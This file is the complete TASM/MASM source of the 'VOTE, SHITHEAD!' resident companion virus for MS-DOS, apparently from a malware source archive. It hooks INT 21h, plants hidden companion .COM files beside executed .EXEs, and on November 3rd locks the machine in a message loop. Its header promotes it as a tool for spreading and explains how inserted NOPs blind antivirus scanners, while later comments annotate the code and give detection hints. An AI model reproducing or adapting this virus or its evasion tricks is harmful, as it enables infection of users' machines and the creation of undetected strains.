MalwareSourceCode/MSDOS/L-Index/Virus.MSDOS.Unknown.lb-349.asm
;****************************************************************************
;* VOTE, SHITHEAD! virus Edited by URNST KOUCH for the Crypt Newsletter 7.
;*
;* TASM/MASM compatible source listing
;*
;* VOTE, SHITHEAD is a resident, companion virus based upon Little
;* Brother code and library .asm routines extracted from Nowhere Man's VCL.
;* It is also 'patched' with three 'nops' (they are commented) which
;* effectively blind a number of a-v scanners. This simple alteration
;* demonstrates a practical benefit of source code possession: quick
;* generation of different virus strains becomes a task within anyone's
;* reach. The only tools needed are a number of virus scanners and patience.
;*
;* In any case, the VOTE virus is just the ideal sample needed for
;* judicious virus action. It is a PERFECT tool for viral spreading for
;* a number of reasons. First, it is a FAST infector. Once resident
;* VOTE will create a companion file for ANY .EXE executed on ANY drive
;* and it will do it so quickly that most users, even suspicious ones,
;* will not notice any slowdown or glitches in machine operation.
;* Second, 'companion-ed' .EXE's will continue to load and function
;* properly when VOTE is resident. At the start of the day's computing,
;* the first 'companion-ed' .EXE executed will misfire ONCE as the virus
;* becomes resident. If it is re-called it will function perfectly.
;* Third, VOTE like the INSUFF viruses in the last newsletter strikes
;* directly at anti-virus suites vulnerable to 'spawning' infections (many
;* no-names, CPAV, NAV) and creates 'hidden' companion files, an improvement
;* over the original virus's modus operandi which left them out in plain
;* sight in the directory. Last, VOTE is very small. In RAM, it is not
;* discernible, taking up slightly less than 0.25k. Characteristically,
;* this is NOT reported by a mem /c display. In fact,
;* VOTE is almost invisible to any number of standard diagnostic
;* tests. Memory maps by QEMM and Norton's SYSINFO will
;* report INT 21 hooked differently. But unless the user can compare
;* an uncontaminated INTERRUPT report with one when the virus IS present,
;* it's unlikely he'll know anything is different. Even then, VOTE is hard
;* to notice.
;*
;* On election day, November 3rd, VOTE will lock an infected machine into
;* a loop as it displays a "DID YOU VOTE, SHITHEAD??" query repetitively
;* across the monitor. Computing will be impossible on Nov. 3rd
;* unless VOTE is removed from the machine, a task accomplished by unmasking
;* all the hidden .COM files and deleting them while
;* the virus is NOT resident. At all other times, VOTE is almost completely
;* transparent.
;****************************************************************************
code segment
assume cs:code,ds:code,es:nothing
.RADIX 16 ;unsuffixed numerals below are hexadecimal (so 'int 21' is INT 21h)
; Three scratch cells placed just past 'endit', i.e. OUTSIDE the endit-begin
; bytes that are copied to segment 0044h and written to companion files.
; They only exist (uninitialised) in the resident copy.
oi21 equ endit ;far ptr: original INT 21h vector, saved at install time
nameptr equ endit+4 ;far ptr: ASCIIZ program name (DS:DX) of the intercepted EXEC
DTA equ endit+8 ;private Disk Transfer Area used by findfirst (see do_com)
;****************************************************************************
;* Check for activation date, then proceed to installation!
;****************************************************************************
org 100h
; Entry point of the companion .COM. Every time a companion is executed:
;   1. payload-date check (day 3, month 11 -> endless message loop),
;   2. otherwise copy this image to segment 0044h and hook INT 21h there.
begin:
call get_day ; AX = day of month (INT 21h/2Ah, DL)
cmp ax,0003h ; day == 3 ?
jne realstrt ; no -> skip the payload, go install
call get_month ; AX = month (INT 21h/2Ah, DH)
cmp ax,000Bh ; month == 11 (November) ?
jne realstrt ; no -> skip the payload, go install
; Payload (Nov 3rd only): print the message forever. Nothing is installed
; on this path; the machine is only usable again after a reboot.
blooie: mov dx, offset shithead ;DS:DX -> '$'-terminated message text
mov ah,9 ;DOS print string
int 21h
jmp blooie ;endless loop
; Installation. Register roles from here on:
;   ES = 0044h (destination segment), CX = image length, then DS = 0 (IVT).
; Detection note: after installation the INT 21h vector points into segment
; 0044h rather than into DOS or a loaded TSR; the header says QEMM/SYSINFO
; interrupt maps show this while MEM /C does not list the resident image.
realstrt: mov ax,0044h ;destination segment 0044h (linear 440h; image lands at 540h)
nop ;inserted no-op (one of the three 'patches' the header describes, aimed at tbSCAN)
mov es,ax
nop ;inserted no-op (aimed at Datatechnik's AVscan)
mov di,0100h ;ES:DI = 0044h:0100h, same offset as this image
mov si,di ;DS:SI = CS:0100h (DS == CS in a .COM)
mov cx,endit - begin ;image length in bytes (also the companion file size)
rep movsb ;copy the image; leaves CX = 0
mov ds,cx ;DS = 0 -> interrupt vector table
mov si,0084h ;0000:0084h = INT 21h vector (21h * 4)
mov di,offset oi21 ;ES:DI -> oi21 inside the 0044h copy
mov dx,offset ni21 ;offset of the replacement handler
lodsw ;AX = current INT 21h handler offset
cmp ax,dx ;already resident? (only the offset is compared, not the segment)
je cancel ;yes -> leave the existing copy alone
stosw ;save current handler offset to oi21
movsw ;save current handler segment to oi21+2
push es ;DS = 0044h
pop ds
mov ax,2521h ;DOS set vector: INT 21h = 0044h:ni21
int 21h
cancel: ret ;.COM entry stack holds 0000 -> PSP:0 (INT 20h) = terminate; the
; original .EXE is NOT run on this invocation (the one-time "misfire" in the header)
;****************************************************************************
;* File-extension masks for checking and naming routines;message text
;****************************************************************************
; Extension strings. change_ext copies all four bytes (letters + NUL) over the
; target's extension in place.
EXE_txt db 'EXE',0
COM_txt db 'COM',0
; Payload text for INT 21h/09h ('$'-terminated), preceded by two BEL (07h)
; bytes so the speaker beeps on every loop. Referenced as 'shithead' at blooie
; (MASM/TASM symbol lookup is case-insensitive by default). Distinctive static
; string for identifying this strain on disk or in memory.
SHITHEAD db "DID YOU VOTE, SHITHEAD??"
db 07h,07h,'$'
;****************************************************************************
;* Interrupt handler 24
;****************************************************************************
; INT 24h (critical error) replacement, installed by do_exe only around the
; create/write of the companion and restored afterwards. Returning AL = 3
; tells DOS to FAIL the call silently, so a write-protected or absent disk
; produces no "Abort, Retry, Fail?" prompt that would reveal the write attempt.
ni24: mov al,03 ;AL = 3 -> fail the offending DOS call
iret
;****************************************************************************
;* Interrupt handler 21
;****************************************************************************
; INT 21h hook. Saves flags/ES/DS/AX/BX/DX, runs infect for AX = 4B00h
; (EXEC: load and execute), then chains to the saved original handler.
; CX, SI and DI are NOT saved even though infect and its helpers modify them.
ni21: pushf
push es
push ds
push ax
push bx
push dx
cmp ax,4B00h ;only AX = 4B00h; other AL sub-functions (01h/03h) pass through
jne exit
doit: call infect ;DS:DX -> ASCIIZ program name supplied by the EXEC caller
exit: pop dx
pop bx
pop ax
pop ds
pop es
popf
jmp dword ptr cs:[oi21] ;far jump to the original handler (it performs the iret)
;****************************************************************************
;* Try to infect a file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
; infect - called from ni21 for every INT 21h/4B00h.
; In:  DS:DX -> ASCIIZ program name. This is the caller's own buffer and is
;      rewritten in place by change_ext, which is how execution is redirected.
; .EXE target: create <base>.COM with attributes read-only/hidden/system/archive
;      holding this image, then put the name back to .EXE so the original still runs.
; .COM target: if it is a companion (size == endit - begin) and <base>.EXE
;      exists, rewrite the name to .EXE so DOS runs the real program instead.
; Detection: a hidden+system+read-only <base>.COM of exactly endit - begin
;      bytes beside a <base>.EXE; INT 24h briefly re-vectored during creation.
infect: cld ;string ops ascend (searchpoint/change_ext rely on DF = 0)
mov word ptr cs:[nameptr],dx ;nameptr = caller's DS:DX
mov word ptr cs:[nameptr+2],ds
mov ah,2Fh ;ES:BX = caller's DTA
int 21
push es ;both restored at 'return'
push bx
push cs ;DS = CS for the rest of the routine
pop ds
mov dx,offset DTA ;switch to the private DTA so the caller's is untouched
mov ah,1Ah
int 21
call searchpoint ;ES:DI -> first character of the 3-letter extension
push di
mov si,offset COM_txt ;extension == 'COM' ?
mov cx,3
rep cmpsb
pop di
jz do_com
mov si,offset EXE_txt ;extension == 'EXE' ?
nop ;'nop' to confuse SCAN v95b. (inserted no-op, see header)
mov cl,3 ;CH is still 0 from the previous compare
rep cmpsb
jnz return ;neither -> pass through untouched
; ---- .EXE target: create the companion ----
do_exe: mov si,offset COM_txt ;name -> <base>.COM
nop ;inserted no-op, see header
call change_ext
mov ax,3300h ;DL = current Ctrl-Break check flag
nop
int 21
push dx ;old flag, restored at return1
cwd ;DX = 0 (AX is positive)
inc ax ;AX = 3301h
push ax ;kept for the restore call
int 21 ;Ctrl-Break checking off while the file is written
mov ax,3524h ;ES:BX = current INT 24h vector
int 21
push bx ;old vector, restored at return1
push es
push cs
pop ds
mov dx,offset ni24 ;DS:DX = cs:ni24
mov ah,25h ;AX = 2524h
push ax ;kept for the restore call
int 21 ;INT 24h = ni24: critical errors fail silently
lds dx,dword ptr [nameptr] ;DS:DX -> <base>.COM
mov ah,03Ch ;DOS create/truncate file, handle returned in AX
mov cx,00100111b ;attributes, intended 27h = read-only|hidden|system|archive
; NOTE(review): .RADIX 16 is in force - confirm the assembler treats the 'b'
; suffix as binary here (findfirst below uses the literal 27h for the same mask).
int 021h
; CF is not checked: if the create failed, AX holds a DOS error code and is
; used as the handle below.
xchg bx,ax ;BX = file handle
push cs
pop ds
mov cx,endit - begin ;write the whole image from CS:begin
mov dx,offset begin
mov ah,40h
int 21
mov ah,3Eh ;close handle
int 21
; ---- undo do_exe's changes in reverse order ----
return1: pop ax ;AX = 2524h
pop ds ;DS:DX = original INT 24h vector
pop dx
int 21
pop ax ;AX = 3301h
pop dx ;DL = original Ctrl-Break flag
int 21
mov si,offset EXE_txt ;name -> <base>.EXE again
call change_ext ;so the chained EXEC runs the original program
; ---- common exit: restore the caller's DTA ----
return: mov ah,1Ah
pop dx ;old DTA offset (was BX)
pop ds ;old DTA segment (was ES)
int 21
ret
; ---- .COM target ----
do_com: call findfirst ;fill cs:DTA for the named .COM (CF not checked)
cmp word ptr cs:[DTA+1Ah],endit - begin ;low word of file size == image length ?
jne return ;ordinary .COM -> run it
mov si,offset EXE_txt ;it is a companion: does <base>.EXE exist ?
call change_ext
call findfirst
jnc return ;yes -> name now .EXE, chained EXEC runs the real program
mov si,offset COM_txt ;no -> put the .COM name back and run the companion
call change_ext
jmp short return
;****************************************************************************
;* Search beginning of extension for name we will usurp
;****************************************************************************
; searchpoint - ES:DI -> first character of the extension of the name at nameptr.
; Scans forward for the terminating NUL, then backs up over the NUL and the
; three extension characters. Assumes the name has a 3-letter extension.
; CL is never set, so the scan limit is whatever CL held (at least 0FF00h).
; Clobbers AL, CX, DI, ES.
searchpoint: les di,dword ptr cs:[nameptr]
mov ch,0FFh
mov al,0 ;scan for NUL
repnz scasb ;DI -> byte after the NUL
sub di,4 ;DI -> first extension char
ret
;****************************************************************************
;* Change the extension of the filename (CS:SI -> ext)
;****************************************************************************
; change_ext - overwrite the extension (and its NUL) of the name at nameptr
; with the 4 bytes at CS:SI ('EXE',0 or 'COM',0).
; Writes into the EXEC caller's buffer, so the chained INT 21h sees the new name.
; Relies on DF = 0 (cld in infect). Clobbers SI, DI, ES; leaves DS = CS.
change_ext: call searchpoint ;ES:DI -> extension
push cs
pop ds
movsw ;2 letters
movsw ;last letter + NUL
ret
;****************************************************************************
;* Find the file
;****************************************************************************
; findfirst - INT 21h/4Eh on the name at nameptr, attribute mask CL = 27h
; (read-only|hidden|system|archive, so hidden companions are found).
; CH is left as the caller set it. Result record goes to the DTA selected by
; infect (cs:DTA); CF set if no match. Clobbers AX, CL, DS, DX.
findfirst: lds dx,dword ptr [nameptr]
mov cl,27h
mov ah,4Eh
int 21
ret
;****************************************************************************
;* Get the day off the system for activation checking
;****************************************************************************
; get_day - AX = day of month from DOS get-date (INT 21h/2Ah returns it in DL).
; Used only by the payload-date check at begin. Clobbers CX, DX.
get_day:
mov ah,02Ah ; DOS get date function
int 021h
mov al,dl ; Copy day into AL
cbw ; Sign-extend AL into AX
ret ; Get back to caller
;*************************************************************************
;* Get the month off the system for activation checking
;*************************************************************************
; get_month - AX = month from DOS get-date (INT 21h/2Ah returns it in DH).
; Used only by the payload-date check at begin. Clobbers CX, DX.
get_month:
mov ah,02Ah ; DOS get date function
int 021h
mov al,dh ; Copy month into AL
cbw ; Sign-extend AL into AX
ret ; Get back to caller
endit: ;end of the image that is copied to 0044h and written to companions
; (endit - begin bytes). oi21, nameptr and DTA, declared via equ above, occupy
; the bytes following this label in the resident copy only.
code ends
end begin